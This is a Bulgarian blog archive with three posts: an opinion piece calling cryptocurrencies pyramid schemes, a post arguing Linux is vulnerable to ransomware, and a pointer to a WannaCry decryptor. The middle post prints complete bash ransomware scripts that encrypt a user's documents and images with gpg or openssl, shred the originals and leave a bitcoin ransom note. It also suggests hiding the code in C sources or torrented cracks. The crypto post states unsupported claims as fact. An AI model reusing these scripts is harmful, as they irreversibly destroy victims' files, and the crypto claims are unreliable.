Category Archives: Encryption

Криптосхеми и измами, или защо да внимавате с криптовалутите

Измамите с криптовалути

Пак стана модерно да се говори за криптовалути, и особено – за биткойна. Нека поразсъждаваме защо това е нещо подобно на финансовите пирамиди от 90те, но в глобален мащаб:

Този, който ви зарибвява говори с непознати за вас термини

Да, точно така. Ще чуете “трейдване”, “трейдъри”, “трейдвам”, вместо просто – “търгувам”. Защото думата “трейдване” звучи някак по-изискано. Нещо непознато, което изглежда уникално и сложно. Те не обменят например лакткойн за биткой, те ексчейнджват лайткойн за биткойн… как звучи само: трейдвам и ексчейнджвам

Ако всичко беше толкова лесно – никой нямаше да ви каже как става

Обещава се бърза и лесна печялба – ти само дай едни пари, и гледай как ти просто ще седиш, и парите ти ще станат повече. Няма такъв филм. Ако беше толкова лесно и бързо – “трейдърите” нямаше да ви продадат криптовалута и да ви вземат парите, и след три месеца например – вие да им върнете криптовалутата, и те да ви дадат два пъти повече пари. Всъщност, възможно е ако сте на максимум второ ниво в пирамидата, и закачите още балъци към нея.

Така наречените ICO (Initial coin offer), или предлагането на “токени”

Има над 1500 крипто валути. И целта на ВСЯКА една от тях е да баправи богати само и единствено създателите си. И никой друг. Т.нар. ICO – това е празен продукт. Това е нещо, което още не е станало готово, но вие можете да си “предплатите” токени и някой ден, евентуално – когато тази криптовалута стане готова, и бъде “пусната” – вие ще получите дял от нея. Но… тук идва въпросът: и за какво ви е? Какво ще я правите? Забелязали ли сте, че 99% от ICO проектите приемат плащане само и единствено в накои от популярните криптовалути, които могат да бъдат продадени моментално, и не могат да бъдат проследени – биткойн, лайткойн, етереум? И ако поискате да платите по банкова сметка – не може, защото основателите на проекта не предоставят такава…. Тяхната цел е само една: да се докопат до биткойните ви, тъй като в момента все още биткойна е доволно скъп. Ако техните “монети” струваха нещо – те нямаше да ви ги дадат на безценица (напр. 1 милион токена за 0.5 биткойна). 

Добивът на криптовалута – и защо е безсмислено да се дават пари за “копачки”
  • Добив с “договор” – тук вие не купувате хардуер, а “наемате” такъв, който работи за вас. Добре, а замисляли ли сте се: ако имаше смисъл, и можеше да си “избиете” вложените пари – защо тогава собственикът на хардуера го отдава под наем, а не го оставя да “копае” за него самият?
  • Покупка на “копачки” – същоъо като по-горе. По пътя на логиката – купувайки една “копачка” вие трябва да може да си “избиете” парите, които сте дали за нея, и после да започне да работи на печалба. А защо тогава продавачът би ви я продал, а не я ползва да работи за него самият?
  • Покупка на видео карти: следващото безсмислено нещо. В идеалният случай (ако цената на това, което “копаете” не падне, и ако “трудността” не се повиши) – ще си я избиете след  6 до 10 месеца, и от там нататък – ще сте на “печалба”. Да ама не – трудността непрекъснато се повишава, “наградата” на блок периодично се намаля на половина. И ето че влязохте в геометрична прогресия – никога няма да си избиете парите, ако не купите още хардуер.
Алчността вреди

Да поговорим и за онези, които са купили биткойн (или друго от популярните криптовалути) още веднага след създаването им. Тогава цената им е била (примерно) $1, и някой е решил да си купи 200 монетки, просто така – “за спорта”.

  • Вариант 1: Продал ги е когато цената им е нарастнала до $1000 да кажем. Той наистина е на печалба. 
  • Вариант 2: зарибил се е и е купил още, с идеята че ще поскъпне и ще спечели повече. Този никога няма да продаде – защото колкото и да поскъпне – той ще очаква още. И още. И още. Няма да продаде на $1000, няма да продаде и на $10.000, няма да продаде и на $100.000 – защото винаги ще чака още. Защото е алчен. И когато биткойна е бил $20.000 и той не е продал тогава, при спада му до $4500 той пак няма да продаде – дори да знае, че утре може да стане $0. Няма да продаде, защото “ще се набута”. Но дори утре да стане $50.000 – той пак няма да продаде. Защото е алчен.
Вечно “държащите” криптовалути

Има хора, които вярват, че някой ден парите щели да изчезнат, и всичко щяло да се плаща само в криптовалута. Те са най-заблудените. За тях няма значение дали 1 койн струва $1 или $10.000.000 – те никога няма да ги продадат. Поради простата причина, че те вярват в таласъми – биткойна щял да измести банките, и всичко щяло да се плаща само в биткойни. Даже щяло да се стигне до там, че нямало да можеш да си купиш кафе, ако нямаш биткони. За тези не мога да коментирам.

Нищо не е такова, каквото изглежда

Има някои хора, които няма да ви заблудят умишлено. Те наистина вярват в идеята на криптовалутата – защото самите те са заблудени. Гледат и четат истории за младежи и девойки, които са забогатели от нищото – защото през 20113-а са си купили биткойни, и са ги продали като бяха по $20.000. Е, това са хитри младежи и девойки, и не са зомбирани до степен да се кефят на цифрите в крипто-портфейла си, вярвайки че някой ден парите ще изчезнат. 

Всичко останало – е измама. Всеки, който ви иска парите с цел да ги направи повече – иска само и единствено да ви вземе парите. Нищо повече, нищо по-малко. Това е.

Омагьосаният кръг

Това е когато дадеш примерно $20.000 за един биткойн, и той стане $4500 след няколко месеца. Ще си на загуба, и ще искаш да “избиеш”. И тогава…. започваш да даваш още и още пари, с цел да “избиеш” при по-малко покачване на цената. Да, но това не се случва. По-добре се примирете с това, че сте загубули, и не се набутвайте повече.

Същото е като да купите “копачки” – та вие дори тока, който изразходват не можете са им платите с това, което ще изкарате. 

Ако наистина искате да спечелите

Забравете за всякакви ICO-та, борси, далавери, “трейдъри” и т.н. Ако сте решили да си пробвате късмета – просто си купете напеимер 1 биткойн, и парите които сте дали за него – ги смятайте за загубени. Ако от $4500 стигне до $6000 – продайте. Имате $1500 печалба! Или продайте толкова, че да си избиете вложението, а останалото запазете – тогава каквото и да се случи поне няма да загуните. Ако ви се струва, че по този начин ще спечелите прекалено малко – то вие сте от групата на алчните. И няма да спечелите никога поради вродената си алчност и ненаситност.

Мъчи ме един въпрос…

Ха сега да видим: Ако от “копането” на биткойни има смисъл… защо производителите на “копачки” ги продават, а не “копаят” с тях, след като те (копачките) по пътя на логиката – би трябвало да струват по-малко, отколкото можеш да изкараш с тях?

Биткойн 2.0 – крахът на биткойна

Преди време публикувах това, и ми се смяха. Биткойна щял да стане $250.000 в рамките на една година, а до 2025 щял да стане $1.000.000. Не знам що за болен мозък трябва да си, за да решиш, че нещо, което реално е нищо ще струва 1.000.000, и дори да струва – кой, по дяволите би дал 1 милион долара за 1 биткойн? Няма абсолютно никаква логика, нито причина някой да го прави. 1 милион за един биткойн? Не звучи ли смешно?

Пирамидата се срути. И не само биткойновата, ами и тази на останалите криптовалути. Който спечелил – спечелил. Умните продадоха на $20.000, знаейки че това е краят на биткойна. Глупавите купиха на $20.000, вярвайки че…. ще забогатеят от нищото. Някой ден. Точно като балъците, които наляха пари в пирамидите у нас през 90-те. Ама едно трябва да призная: службите, които са измислили биткойна са просто гениални. Изключително добра идея. Разбира се, първите “закачени” са на плюс – това е и идеята на пирамидата. Но пък се разкриха ужасно много схемаджии – поради простата причина, че повярваха как биткойна бил непроследим, как никой и по никакъв начин не можел да го контролира… неразбирайки, че никой никога не би създал нещо, което не може да контролира. Никога и никой няма да го направи – да създаде нещо, което не може да се проследи и контролира! Това е извън всякаква логика.

Биткойн умря. Краят му настъпи – който е купил на $20.000 – няма да продаде сега на $5000, защото ще е на загуба. Който е купил на $200 и не е продал на $20.000 – няма да продае сега, защото ще чака пак да стана $20.000. И всъщност, поради чистата си просташка алчност и лакомия – няма да продаде дори и пак да стигне $20.000, защото…. ще чака да стане $1.000.000.

Ransomware в Linux – възможно ли е?

МОЛЯ, ИМАЙТЕ ПРЕДВИД, ЧЕ АКО ИЗПРОБВАТЕ ПОКАЗАНИТЕ ТУК КОМАНДИ Е МНОГО ВЕРОЯТНО ТОВА ДА ДОВЕДЕ ДО БЕЗВЪЗВРАТНА ЗАГУБА НА ФАЙЛОВЕТЕ ВИ! АКО ВСЕ ПАК СТЕ РЕШИЛИ ДА ИЗПРОБВАТЕ НЕЩО ОТ ПОКАЗАНОТО ТУК – ПРАВЕТЕ ГО ИЗЦЯЛО НА СВОЙ РИСК И ОТГОВОРНОСТ! ВСИЧКО, ПОКАЗАНО ТУК Е С ДЕМОНСТРАЦИОННА ЦЕЛ! АВТОРЪТ НЕ НОСИ НИКАКВА ОТГОВОРНОСТ ЗА КАКВИТО И ДА Е ВРЕДИ И/ИЛИ ПОВРЕДИ – РЕАЛНИ ИЛИ ВЪОБРАЖАЕМИ, НАСТЪПИЛИ В РЕЗУЛТАТ НА ИЗПОЛЗВАНЕТО НА ПОКАЗАНАТА ТУК ИНФОРМАЦИЯ!!!

АКО ВСЕ ПАК РЕШИТЕ ДА ИЗПОРОБВАТЕ НЕЩО – ВИ СЪВЕТВАМ ДА ГО ПРАВИТЕ В ИЗОЛИРАНА ВИРТУАЛНА МАШИНА! 

Възможно ли е да има ransomware в Linux? Или…. мит ли е по-голямата сигурност, ако ползваме Linux за десктоп?

Отговорът е ДА. Възможно е. Самият Линукс разполага с необходимите инструменти, с които може да се извърши криптирането на файловете. А как ще се задейства това – е въпрос на избор на този, който реши да създаде ransomware за Linux.

Покрай WannaCry паниката, която е напълно излишна (защото нито е първи, нито ще е последен ransomware) се породиха много спорове из форумите как видите ли – Виндовс бил уязвим, ама за Линукс нямало никакъв риск, защото тези неща не вървели не Линукс….

Както вече стана ясно – WannaCry работи перфектно и на Линукс, стига да имате Wine. А то почти всеки има ?

Възможно ли е да се направи нещо подобно и на Линукс? Разбира се.

Та, един пример:

for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’); do echo “1234” | gpg –batch –no-tty –yes –passphrase-fd 0 -c -o $f.enc $f; done

И за да кажем как да ни платят, и да сме истински хакери, като омажем максимално оригиналните файлове:

for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’); do echo “1234” | gpg –batch –no-tty –yes –passphrase-fd 0 -c -o $f.enc $f; shred $f; echo “Send 10000 bitcoins to get your data back”>$f; done

Вместо gpg може да ползеаме openssl, ето един примерен и изключително прост bash скрипт, който върши перфектна работа:

#!/bin/bash

ENCRYPT=`tr -dc A-Za-z0-9_ < /dev/urandom | head -c 150 | xargs`

for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’ -or -name ‘*.jpeg’ -or -name ‘*.pdf’ -or -name ‘*.doc’ -or -name ‘*.docx’);

do openssl des3 -k $ENCRYPT -in $f -out $f.encrypted; shred $f;

echo “Send 0.4 bitcoins to get your data back: 1G9Emf3VRMrm1pZEzFs6ZqAwHdUuijJ4Et ” > $f;

done

echo $ENCRYPT > PRIVATE.KEY

Декриптиране – в случай, че имаме паролата:

#!/bin/bash

DECRYPT=`cat PRIVATE.KEY` 

for f in $(find ~/ -name ‘*.encrypted’); 

do 

openssl des3 -k $DECRYPT -d -in $f -out ${f%.*}; 

rm $f; 

done

Последното ще работи само и единствено ако имаме паролата.

като след find-а може да има колкто си искаме *.нещоси, като и накрая като се добави едно rm $f, или за да сме още по-зли: shred $f;

Това нещо ще криптира всички *.txt., *.jpg, *.png файлове. Този списък може да се разшири до безкрайност.

Това чудо например се преобразува в shellcode, набутва се в накой дълъг .c файл, който е част от някаква програмка, която потребителят ще се излъже да комилира и стартира, и… стават чудеса

Друг вариант е да се изсипе чрез някой торент – напр. като крак, като keygen, като част от някаква програмка… варианти има хиляди.

Едно стартиране, и файловете са криптирани безвъзвратно…

Как ще се подаде паролата (в случая – 1234) и дали по някакъв начин скрипта ще я вземе “отвън”, ще я генерира на момента (напр. tr -dc A-Za-z0-9_ < /dev/urandom | head -c 150 | xargs) и ще я изпрати към външен сървър, за да я съхранява там – вариантите пак са много.

Скрипт, използващ gpg:

#!/bin/bash

ENCRYPT=`tr -dc A-Za-z0-9_ < /dev/urandom | head -c 150 | xargs`
for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’); do echo $ENCRYPT | gpg –batch –no-tty –yes –passphrase-fd 0 -c -o $f.enc $f; shred $f; echo “Send 10000 bitcoins to get your data back”>$f; done
echo “$ENCRYPT”>PRIVATE.KEY;

Ако ще пробвате нещо – ключа се записва в PRIVATE.KEY в текущата директория. Декриптиранрто става по обратен ред, именно:

PW=`cat PRIVATE.KEY`

echo $PW | gpg –batch –no-tty –yes –passphrase-fd 0 -d -o original-decrypted-file.txt encrypted-file.txt.enc

Та, в 90% от случаите не са виновни операционните системи, а хората които работят с тях. Защо ли? Да вземем за пример Виндовс:

Инсталират се основно пиратски версии, от Замунда. Първата работа на инсталиращия е да спре update-ите на Виндовса… познавам хора, които се мислят за особено големи разбирачи, и спират упдейтите дори на лицензен Виндовс, защото, цитирам: “закво са ми тия упдейти, само ми бавят компютъра”.

За Линукс пък заблудата е друга: че такива атаки там били невъзможни. Не, не са невъзможни а просто Линукс не е интересен за хакерите.

Това, което пишат масово по форуми и блогове – “инсталирайте си Линукс и ще забравите за вирусите” изобщо, ама изобщо не е така. Варианти винаги има! Дали нещо ще се изпълни през Wine, дали ще е забутано някъде – няма никакво значение. А на този криптиращ скрипт не му трябват никакви права – той ще си свърши работата в потребителската директория, а с малко тунинг (find / -writable) ще претърси цялата система за файлове, които са с права за писане за съответният потребител и ще ги омаже както си иска. Ако пък някой вземе, че го пусне с администраторски права…. става мазало. И ако нямаш паролата, за да изпълниш gpg -d $f.enc

Някой ще каже “ама аз може да нямам gpg”. Може бе, ама… мисля, че идеята е ясна.

С малко фантазия и няколко реда код могат да се сътворят такива бели, че после оправия да няма.

Всеки запален по Линукс твърди, че е недосегаем…. е, не съвсем.

Тъй като на някои места видях коментари, че ползването на urandom било “бавно”… не е съвсем бавно! urandom се ползва в случая само и единствено за генериране на 150-символна random парола. И повярвайте – става доста бързо…

gpg било бавно… ами ОК, ей го на и с openssl. Бавно бавно… колко да е бавно? Който мисли, че е бавно – да си създаде един потребител в линукса, и да му напъли home директорията с разни снимки и документи, пък да тества ?  1.1GB данни (снимки + текстови файлове):

с gpg:

time ./encrypt.sh
real 0m23.455s

user 0m10.700s

sys 0m0.937s

с openssl:

time ./openssh.sh
real 0m10.663s

user 0m1.257s

sys 0m0.561s

1.1GB за 23 секунди в пъряия случай, и за 10 – във втория. Не мисля, че е много бавно.

Ама било нямало как да се разпространи – не ми е това идеята, иначе повярвайте – може. Всичко може.  Просто не искам да го правя, защото няма смисъл.

Wana Kiwi – Wana Cry Decriptor tool

Едва ли ще свърши работа, но все пак си е нещо:

Ако сте заразени с Wana Cry, и искате да си спасите файловете имате шанс. НО! Не трябва да сте си рестартирали компютъра след каото е бил заразен

Ако не сте го рестартирали, може да изтеглите decryptor от тук: https://github.com/gentilkiwi/wanakiwi/releases

 

А за повече информация тук:

http://thehackernews.com/2017/05/wannacry-ransomware-decryption-tool.html